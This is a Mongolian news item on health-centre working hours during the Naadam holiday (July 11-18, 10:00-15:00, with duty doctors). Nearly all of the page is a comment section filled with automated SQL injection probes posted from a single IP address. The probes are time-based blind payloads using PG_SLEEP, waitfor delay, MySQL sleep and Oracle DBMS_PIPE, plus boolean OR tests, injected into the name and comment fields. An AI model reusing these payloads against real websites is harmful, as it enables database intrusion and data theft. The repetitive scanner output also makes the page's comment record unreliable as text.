Наадмын өдрүүдэд өрх, сумын эмнэлгүүд 15:00 цаг хүртэл ажиллана

Aдмин / Эрүүл мэнд

Эрүүл мэндийн яамнаас цаг үеийн асуудлаар өнөөдөр мэдээлэл хийлээ.

Энэ үеэр баяр наадмын өдрүүдэд эрүүл мэндийн байгууллагууд хэрхэн ажиллах талаар ЭМЯ-ны Анхан болон лавлагаа шатлалын тусламжийн хэлтсийн дарга Г.Навчаа мэдээлэл өглөө.

Тэрбээр “Эмнэлгийн тусламж үйлчилгээг зохицуулах тухай тушаалыг бүх шатны эрүүл мэндийн байгууллага гаргаж, баяр наадмын өдрүүдэд эмнэлгийн тусламж үйлчилгээний тасралтгүй байдлыг урьдын адил хангаж ажиллана. Нийслэл, аймгуудын эрүүл мэндийн газрууд шуурхай штабын хариуцлагатай жижүүр гарган бэлэн байдлыг хангах юм.

Ингэхдээ эрүүл мэндийн анхан шатны тусламж үйлчилгээ үзүүлэх төв буюу өрх, сумын эрүүл мэндийн төвүүд долдугаар сарын 11-18-ны өдрүүдэд 10:00-15:00 цагийн хооронд ажиллана.

Өрхийн эрүүл мэндийн төв тус бүр дээр жижүүр их эмч, сувилагч нар ажиллах бөгөөд товлосон төлөвлөгөөт эмийн эмчилгээ хийгдэхгүй. Тухайн өвчтөнд ямар нэг зовуурь илэрсэн, эмчид хандах шаардлага гарсан тохиолдолд жижүүр эмч нар үүргээ гүйцэтгэнэ.


Сэтгэгдэл

Зочин [@@DZK7x] 2022-07-10 23:15:27

Зочин [1] 2022-07-10 23:15:26

Зочин [1'"] 2022-07-10 23:15:26

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 23:15:25

Зочин [DAmvAK4G')) OR 601=(SELECT 601 FROM PG_SLEEP(15))--] 2022-07-10 23:15:13

Зочин [xtwzNSEh') OR 128=(SELECT 128 FROM PG_SLEEP(15))--] 2022-07-10 23:15:00

Зочин [8ODv2H6z' OR 144=(SELECT 144 FROM PG_SLEEP(15))--] 2022-07-10 23:14:47

Зочин [CuNHJfYd'; waitfor delay '0:0:15' -- ] 2022-07-10 23:14:35

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-10 23:14:23

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 23:14:10

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 23:13:59

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 23:13:47

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-10 23:13:35

Зочин [-1" OR 2+60-60-1=0+0+0+1 -- ] 2022-07-10 23:13:23

Зочин [-1' OR 2+669-669-1=0+0+0+1 or 'A8Xm83wW'='] 2022-07-10 23:13:23

Зочин [-1' OR 2+703-703-1=0+0+0+1 -- ] 2022-07-10 23:13:22

Зочин [-1 OR 2+541-541-1=0+0+0+1] 2022-07-10 23:13:22

Зочин [-1 OR 2+25-25-1=0+0+0+1 -- ] 2022-07-10 23:13:22

Зочин [0nF9vyY9] 2022-07-10 23:13:21

aiPxvpay [@@XyW3s] 2022-07-10 23:13:20

1

aiPxvpay [1] 2022-07-10 23:13:19

1

aiPxvpay [1'"] 2022-07-10 23:13:19

1

aiPxvpay [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 23:13:18

1

Зочин [196.196.203.214] 2022-07-10 23:13:09

aiPxvpay [0ZpL862R')) OR 243=(SELECT 243 FROM PG_SLEEP(15))--] 2022-07-10 23:13:06

1

Зочин [196.196.203.214] 2022-07-10 23:12:57

aiPxvpay [uosTDxcX') OR 228=(SELECT 228 FROM PG_SLEEP(15))--] 2022-07-10 23:12:54

1

Зочин [196.196.203.214] 2022-07-10 23:12:44

aiPxvpay [e3Qwu8Lb' OR 925=(SELECT 925 FROM PG_SLEEP(15))--] 2022-07-10 23:12:42

1

Зочин [196.196.203.214] 2022-07-10 23:12:32

aiPxvpay [IUUpZWen'; waitfor delay '0:0:15' -- ] 2022-07-10 23:12:30

1

aiPxvpay [1 waitfor delay '0:0:15' -- ] 2022-07-10 23:12:18

1

Зочин [@@7J5n0] 2022-07-10 23:12:16

Зочин [1] 2022-07-10 23:12:16

Зочин [1'"] 2022-07-10 23:12:15

Зочин [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 23:12:15

aiPxvpay [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 23:12:06

1

Зочин [rVSRryAQ')) OR 656=(SELECT 656 FROM PG_SLEEP(15))--] 2022-07-10 23:12:03

aiPxvpay [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 23:11:54

1

Зочин [IOK7aFCZ') OR 142=(SELECT 142 FROM PG_SLEEP(15))--] 2022-07-10 23:11:51

aiPxvpay [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 23:11:42

1

Зочин [ckXBxrhi' OR 615=(SELECT 615 FROM PG_SLEEP(15))--] 2022-07-10 23:11:39

aiPxvpay [if(now()=sysdate(),sleep(15),0)] 2022-07-10 23:11:29

1

Зочин [BlrLsH1c'; waitfor delay '0:0:15' -- ] 2022-07-10 23:11:26

aiPxvpay [-1" OR 2+231-231-1=0+0+0+1 -- ] 2022-07-10 23:11:17

1

aiPxvpay [-1' OR 2+688-688-1=0+0+0+1 or '9PlHRztR'='] 2022-07-10 23:11:16

1

aiPxvpay [-1' OR 2+460-460-1=0+0+0+1 -- ] 2022-07-10 23:11:16

1

aiPxvpay [-1 OR 2+613-613-1=0+0+0+1] 2022-07-10 23:11:16

1

aiPxvpay [-1 OR 2+209-209-1=0+0+0+1 -- ] 2022-07-10 23:11:15

1

aiPxvpay [PoJ9XeVD] 2022-07-10 23:11:15

1

Зочин [1 waitfor delay '0:0:15' -- ] 2022-07-10 23:11:14

aiPxvpay [196.196.203.214] 2022-07-10 23:11:02

1

Зочин [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 23:11:01

aiPxvpay [196.196.203.214] 2022-07-10 23:10:50

1

Зочин [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 23:10:49

Зочин [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 23:10:37

aiPxvpay [196.196.203.214] 2022-07-10 23:10:37

1

Зочин [if(now()=sysdate(),sleep(15),0)] 2022-07-10 23:10:25

aiPxvpay [196.196.203.214] 2022-07-10 23:10:24

1

Зочин [-1" OR 2+191-191-1=0+0+0+1 -- ] 2022-07-10 23:10:13

Зочин [-1' OR 2+411-411-1=0+0+0+1 or 'Etd9sDY8'='] 2022-07-10 23:10:12

Зочин [-1' OR 2+587-587-1=0+0+0+1 -- ] 2022-07-10 23:10:12

Зочин [-1 OR 2+786-786-1=0+0+0+1] 2022-07-10 23:10:11

Зочин [-1 OR 2+640-640-1=0+0+0+1 -- ] 2022-07-10 23:10:11

Зочин [ojq7pSNz] 2022-07-10 23:10:10

Зочин [196.196.203.214] 2022-07-10 23:09:58

Зочин [196.196.203.214] 2022-07-10 23:09:46

Зочин [196.196.203.214] 2022-07-10 23:09:32

Зочин [196.196.203.214] 2022-07-10 23:09:31

Зочин [196.196.203.214] 2022-07-10 23:09:18

Зочин [196.196.203.214] 2022-07-10 23:09:06

Зочин [196.196.203.214] 2022-07-10 23:08:59

Зочин [196.196.203.214] 2022-07-10 23:08:54

Зочин [196.196.203.214] 2022-07-10 23:08:46

Зочин [196.196.203.214] 2022-07-10 23:08:41

Зочин [196.196.203.214] 2022-07-10 23:08:35

@@bErfO

Зочин [196.196.203.214] 2022-07-10 23:08:34

1

Зочин [196.196.203.214] 2022-07-10 23:08:34

1'"

Зочин [196.196.203.214] 2022-07-10 23:08:33

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

Зочин [196.196.203.214] 2022-07-10 23:08:28

Зочин [196.196.203.214] 2022-07-10 23:08:22

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-10 23:08:17

Зочин [196.196.203.214] 2022-07-10 23:08:10

aGClXwpj')) OR 922=(SELECT 922 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:08:05

Зочин [196.196.203.214] 2022-07-10 23:07:57

ZzUOMxVd') OR 164=(SELECT 164 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:07:52

Зочин [196.196.203.214] 2022-07-10 23:07:45

XEmwoiiT' OR 434=(SELECT 434 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:07:33

-1)) OR 579=(SELECT 579 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:07:28

Зочин [196.196.203.214] 2022-07-10 23:07:20

-5) OR 922=(SELECT 922 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:07:15

Зочин [196.196.203.214] 2022-07-10 23:07:08

-5 OR 336=(SELECT 336 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:07:03

Зочин [196.196.203.214] 2022-07-10 23:06:56

fiKaPVF9'; waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 23:06:52

1

Зочин [196.196.203.214] 2022-07-10 23:06:52

aiPxvpay [196.196.203.214] 2022-07-10 23:06:46

1

Зочин [196.196.203.214] 2022-07-10 23:06:44

1 waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 23:06:40

1

Зочин [196.196.203.214] 2022-07-10 23:06:39

Зочин [196.196.203.214] 2022-07-10 23:06:30

-1); waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 23:06:28

@@BWaHV

aiPxvpay [196.196.203.214] 2022-07-10 23:06:27

1

Зочин [196.196.203.214] 2022-07-10 23:06:27

aiPxvpay [196.196.203.214] 2022-07-10 23:06:27

1'"

aiPxvpay [196.196.203.214] 2022-07-10 23:06:26

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

aiPxvpay [196.196.203.214] 2022-07-10 23:06:20

1

Зочин [196.196.203.214] 2022-07-10 23:06:18

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 23:06:14

aiPxvpay [196.196.203.214] 2022-07-10 23:06:14

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

Зочин [196.196.203.214] 2022-07-10 23:06:14

Зочин [196.196.203.214] 2022-07-10 23:06:13

Зочин [196.196.203.214] 2022-07-10 23:06:13

Зочин [196.196.203.214] 2022-07-10 23:06:13

Зочин [196.196.203.214] 2022-07-10 23:06:12

aiPxvpay [196.196.203.214] 2022-07-10 23:06:07

1

Зочин [196.196.203.214] 2022-07-10 23:06:06

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

aiPxvpay [196.196.203.214] 2022-07-10 23:06:03

IQE6fnjK')) OR 959=(SELECT 959 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:06:01

aiPxvpay [196.196.203.214] 2022-07-10 23:05:56

1

Зочин [196.196.203.214] 2022-07-10 23:05:54

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

aiPxvpay [196.196.203.214] 2022-07-10 23:05:51

zMfYQYyX') OR 304=(SELECT 304 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:05:48

aiPxvpay [196.196.203.214] 2022-07-10 23:05:44

1

Зочин [196.196.203.214] 2022-07-10 23:05:42

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

aiPxvpay [196.196.203.214] 2022-07-10 23:05:38

uoOMJVCi' OR 896=(SELECT 896 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:05:35

aiPxvpay [196.196.203.214] 2022-07-10 23:05:32

1

Зочин [196.196.203.214] 2022-07-10 23:05:29

if(now()=sysdate(),sleep(15),0)

aiPxvpay [196.196.203.214] 2022-07-10 23:05:26

-1)) OR 333=(SELECT 333 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:05:23

aiPxvpay [196.196.203.214] 2022-07-10 23:05:20

1

Зочин [196.196.203.214] 2022-07-10 23:05:17

-1" OR 2+91-91-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:05:17

-1' OR 2+617-617-1=0+0+0+1 or 'z2DTZwBb'='

Зочин [196.196.203.214] 2022-07-10 23:05:17

-1' OR 2+885-885-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:05:16

-1 OR 2+824-824-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-10 23:05:16

-1 OR 2+704-704-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 23:05:15

6gAIunPB

aiPxvpay [196.196.203.214] 2022-07-10 23:05:15

-5) OR 104=(SELECT 104 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 23:05:08

1

Зочин [196.196.203.214] 2022-07-10 23:05:04

1

aiPxvpay [196.196.203.214] 2022-07-10 23:05:03

-5 OR 647=(SELECT 647 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 23:04:52

1

aiPxvpay [196.196.203.214] 2022-07-10 23:04:51

vxrRrxMp'; waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 23:04:44

1

@@az1ny [196.196.203.214] 2022-07-10 23:04:40

1 [196.196.203.214] 2022-07-10 23:04:39

1'" [196.196.203.214] 2022-07-10 23:04:39

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 23:04:38

aiPxvpay [196.196.203.214] 2022-07-10 23:04:38

1 waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 23:04:32

1

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-10 23:04:23

aiPxvpay [196.196.203.214] 2022-07-10 23:04:23

-1); waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 23:04:17

1

cVsXJnle')) OR 396=(SELECT 396 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:04:09

aiPxvpay [196.196.203.214] 2022-07-10 23:04:09

-1; waitfor delay '0:0:15' --

aiPxvpay [196.196.203.214] 2022-07-10 23:04:03

1

3TgbDxqA') OR 198=(SELECT 198 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:03:57

aiPxvpay [196.196.203.214] 2022-07-10 23:03:57

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

aiPxvpay [196.196.203.214] 2022-07-10 23:03:50

1

g9NszJyO' OR 128=(SELECT 128 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:03:44

aiPxvpay [196.196.203.214] 2022-07-10 23:03:43

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

aiPxvpay [196.196.203.214] 2022-07-10 23:03:38

1

-1)) OR 846=(SELECT 846 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:03:32

aiPxvpay [196.196.203.214] 2022-07-10 23:03:31

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

aiPxvpay [196.196.203.214] 2022-07-10 23:03:26

1

aiPxvpay [196.196.203.214] 2022-07-10 23:03:25

1

aiPxvpay [196.196.203.214] 2022-07-10 23:03:25

1

aiPxvpay [196.196.203.214] 2022-07-10 23:03:25

1

aiPxvpay [196.196.203.214] 2022-07-10 23:03:24

1

-5) OR 741=(SELECT 741 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:03:20

aiPxvpay [196.196.203.214] 2022-07-10 23:03:19

if(now()=sysdate(),sleep(15),0)

-5 OR 159=(SELECT 159 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:03:08

aiPxvpay [196.196.203.214] 2022-07-10 23:03:08

-1" OR 2+581-581-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 23:03:07

-1' OR 2+876-876-1=0+0+0+1 or 'aoBn6gJD'='

aiPxvpay [196.196.203.214] 2022-07-10 23:03:07

-1' OR 2+240-240-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 23:03:06

-1 OR 2+812-812-1=0+0+0+1

aiPxvpay [196.196.203.214] 2022-07-10 23:03:06

-1 OR 2+797-797-1=0+0+0+1 --

aiPxvpay [196.196.203.214] 2022-07-10 23:03:05

kZ2XVyak

QTrOb5UK'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:02:56

aiPxvpay [196.196.203.214] 2022-07-10 23:02:54

1

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:02:45

aiPxvpay [196.196.203.214] 2022-07-10 23:02:42

1

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:02:33

@@gZPi2 [196.196.203.214] 2022-07-10 23:02:30

1

1 [196.196.203.214] 2022-07-10 23:02:30

1

1'" [196.196.203.214] 2022-07-10 23:02:29

1

aiPxvpay'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 23:02:29

1

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:02:20

96LT4Q3D')) OR 735=(SELECT 735 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:02:17

1

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 23:02:08

8T4Hs9VM') OR 458=(SELECT 458 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:02:05

1

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 23:01:56

iS88C1io' OR 296=(SELECT 296 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 23:01:53

1

Зочин [196.196.203.214] 2022-07-10 23:01:49

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 23:01:44

v6nwLEc0'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:01:41

1

Зочин [196.196.203.214] 2022-07-10 23:01:37

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 23:01:32

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 23:01:29

1

Зочин [196.196.203.214] 2022-07-10 23:01:25

@@UPche

Зочин [196.196.203.214] 2022-07-10 23:01:25

1

Зочин [196.196.203.214] 2022-07-10 23:01:25

1'"

Зочин [196.196.203.214] 2022-07-10 23:01:24

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

-1" OR 2+644-644-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:01:21

-1' OR 2+195-195-1=0+0+0+1 or 'iMX3NAVy'=' [196.196.203.214] 2022-07-10 23:01:20

-1' OR 2+549-549-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:01:20

-1 OR 2+827-827-1=0+0+0+1 [196.196.203.214] 2022-07-10 23:01:19

-1 OR 2+573-573-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:01:19

emNzUGOV [196.196.203.214] 2022-07-10 23:01:19

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 23:01:17

1

Зочин [196.196.203.214] 2022-07-10 23:01:13

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)

1 [196.196.203.214] 2022-07-10 23:01:07

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 23:01:04

1

Зочин [196.196.203.214] 2022-07-10 23:00:59

jLxru0Jd')) OR 704=(SELECT 704 FROM PG_SLEEP(15))--

1 [196.196.203.214] 2022-07-10 23:00:54

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 23:00:51

1

Зочин [196.196.203.214] 2022-07-10 23:00:48

gAtmbcGC') OR 898=(SELECT 898 FROM PG_SLEEP(15))--

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 23:00:39

1

Зочин [196.196.203.214] 2022-07-10 23:00:36

LDSyaJKu' OR 674=(SELECT 674 FROM PG_SLEEP(15))--

-1" OR 2+858-858-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:00:25

1

-1' OR 2+647-647-1=0+0+0+1 or 'L84Fxtfw'=' [196.196.203.214] 2022-07-10 23:00:24

1

-1' OR 2+934-934-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:00:24

1

-1 OR 2+923-923-1=0+0+0+1 [196.196.203.214] 2022-07-10 23:00:23

1

-1 OR 2+458-458-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 23:00:23

1

yQ42epZu [196.196.203.214] 2022-07-10 23:00:23

1

Зочин [196.196.203.214] 2022-07-10 23:00:22

-1)) OR 586=(SELECT 586 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 23:00:14

1

aiPxvpay [196.196.203.214] 2022-07-10 23:00:11

1

Зочин [196.196.203.214] 2022-07-10 23:00:10

-5) OR 789=(SELECT 789 FROM PG_SLEEP(15))--

aiPxvpay [196.196.203.214] 2022-07-10 23:00:02

1

aiPxvpay [196.196.203.214] 2022-07-10 22:59:58

1

Зочин [196.196.203.214] 2022-07-10 22:59:58

-5 OR 461=(SELECT 461 FROM PG_SLEEP(15))--

Зочин [196.196.203.214] 2022-07-10 22:59:50

1

Зочин [196.196.203.214] 2022-07-10 22:59:45

6dP04FDQ'; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:59:37

1

Зочин [196.196.203.214] 2022-07-10 22:59:33

1 waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:59:22

-1); waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:59:10

-1; waitfor delay '0:0:15' --

Зочин [196.196.203.214] 2022-07-10 22:58:58

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

Зочин [196.196.203.214] 2022-07-10 22:58:45

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

Зочин [196.196.203.214] 2022-07-10 22:58:32

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

Зочин [196.196.203.214] 2022-07-10 22:58:21

Зочин [196.196.203.214] 2022-07-10 22:58:20

if(now()=sysdate(),sleep(15),0)

Зочин [196.196.203.214] 2022-07-10 22:58:09

Зочин [196.196.203.214] 2022-07-10 22:58:08

-1" OR 2+775-775-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:58:07

-1' OR 2+365-365-1=0+0+0+1 or 'KtexieBS'='

Зочин [196.196.203.214] 2022-07-10 22:58:07

-1' OR 2+81-81-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:58:06

-1 OR 2+79-79-1=0+0+0+1

Зочин [196.196.203.214] 2022-07-10 22:58:06

-1 OR 2+430-430-1=0+0+0+1 --

Зочин [196.196.203.214] 2022-07-10 22:58:06

FQ4mXWdX

Зочин [196.196.203.214] 2022-07-10 22:57:54

1

Зочин [196.196.203.214] 2022-07-10 22:57:42

1

@@HmJwj [196.196.203.214] 2022-07-10 22:57:30

1 [196.196.203.214] 2022-07-10 22:57:29

aiPxvpay [196.196.203.214] 2022-07-10 22:57:29

1

1'" [196.196.203.214] 2022-07-10 22:57:29

1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||' [196.196.203.214] 2022-07-10 22:57:28

aiPxvpay [196.196.203.214] 2022-07-10 22:57:17

1

1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15) [196.196.203.214] 2022-07-10 22:57:16

LJebiIHT')) OR 581=(SELECT 581 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:57:04

QBA6Dndm') OR 960=(SELECT 960 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:56:52

AgxzWKij' OR 695=(SELECT 695 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:56:39

-1)) OR 213=(SELECT 213 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:56:25

-5) OR 802=(SELECT 802 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:56:12

-5 OR 778=(SELECT 778 FROM PG_SLEEP(15))-- [196.196.203.214] 2022-07-10 22:55:59

RgUXdWTm'; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:55:47

1 waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:55:35

-1); waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:55:22

-1; waitfor delay '0:0:15' -- [196.196.203.214] 2022-07-10 22:55:07

(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/ [196.196.203.214] 2022-07-10 22:54:54

0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z [196.196.203.214] 2022-07-10 22:54:42

0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z [196.196.203.214] 2022-07-10 22:54:29

if(now()=sysdate(),sleep(15),0) [196.196.203.214] 2022-07-10 22:54:16

-1" OR 2+32-32-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:54:04

-1' OR 2+151-151-1=0+0+0+1 or 'Qu0fonad'=' [196.196.203.214] 2022-07-10 22:54:03

-1' OR 2+345-345-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:54:03

-1 OR 2+751-751-1=0+0+0+1 [196.196.203.214] 2022-07-10 22:54:02

-1 OR 2+514-514-1=0+0+0+1 -- [196.196.203.214] 2022-07-10 22:54:02

4hjGwixz [196.196.203.214] 2022-07-10 22:54:02

1 [196.196.203.214] 2022-07-10 22:53:48

1 [196.196.203.214] 2022-07-10 22:53:35

Зочин [196.196.203.214] 2022-07-10 22:50:51

Зочин [196.196.203.214] 2022-07-10 22:50:39

Зочин [196.196.203.214] 2022-07-10 22:42:46

1

Зочин [196.196.203.214] 2022-07-10 22:42:46

1

Зочин [196.196.203.214] 2022-07-10 22:42:46

1

Зочин [196.196.203.214] 2022-07-10 22:42:46

1

Зочин [196.196.203.214] 2022-07-10 22:42:46

1

Зочин [196.196.203.214] 2022-07-10 22:42:46

1

Зочин [196.196.203.214] 2022-07-10 22:41:07

1

Зочин [196.196.203.214] 2022-07-10 22:41:06

1

Зочин [196.196.203.214] 2022-07-10 22:41:06

1

Зочин [196.196.203.214] 2022-07-10 22:41:06

1

Зочин [196.196.203.214] 2022-07-10 22:41:06

1

Зочин [196.196.203.214] 2022-07-10 22:41:06

1

Зочин [196.196.203.214] 2022-07-10 22:40:44

Зочин [196.196.203.214] 2022-07-10 22:40:44

Зочин [196.196.203.214] 2022-07-10 22:40:44

aiPxvpay [196.196.203.214] 2022-07-10 22:40:23

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:23

1

aiPxvpay [196.196.203.214] 2022-07-10 22:40:23

1

Зочин [196.196.203.214] 2022-07-10 22:40:19

Зочин [196.196.203.214] 2022-07-10 22:40:19

aiPxvpay [@@JnoDd] 2022-07-10 23:09:28

1

aiPxvpay [1] 2022-07-10 23:09:27

1

aiPxvpay [1'"] 2022-07-10 23:09:27

1

aiPxvpay [196.196.203.214'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'] 2022-07-10 23:09:26

1

aiPxvpay [bpSSARV3')) OR 525=(SELECT 525 FROM PG_SLEEP(15))--] 2022-07-10 23:09:14

1

aiPxvpay [UHS3sW6V') OR 286=(SELECT 286 FROM PG_SLEEP(15))--] 2022-07-10 23:09:01

1

aiPxvpay [EtKHHzaU' OR 548=(SELECT 548 FROM PG_SLEEP(15))--] 2022-07-10 23:08:49

1

aiPxvpay [QXZ4EGen'; waitfor delay '0:0:15' -- ] 2022-07-10 23:08:37

1

aiPxvpay [1 waitfor delay '0:0:15' -- ] 2022-07-10 23:08:24

1

aiPxvpay [(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/] 2022-07-10 23:08:12

1

aiPxvpay [0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z] 2022-07-10 23:08:01

1

aiPxvpay [0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z] 2022-07-10 23:07:48

1

aiPxvpay [if(now()=sysdate(),sleep(15),0)] 2022-07-10 23:07:36

1

aiPxvpay [-1" OR 2+200-200-1=0+0+0+1 -- ] 2022-07-10 23:07:23

1

aiPxvpay [-1' OR 2+741-741-1=0+0+0+1 or 'oNFR0JjB'='] 2022-07-10 23:07:23

1

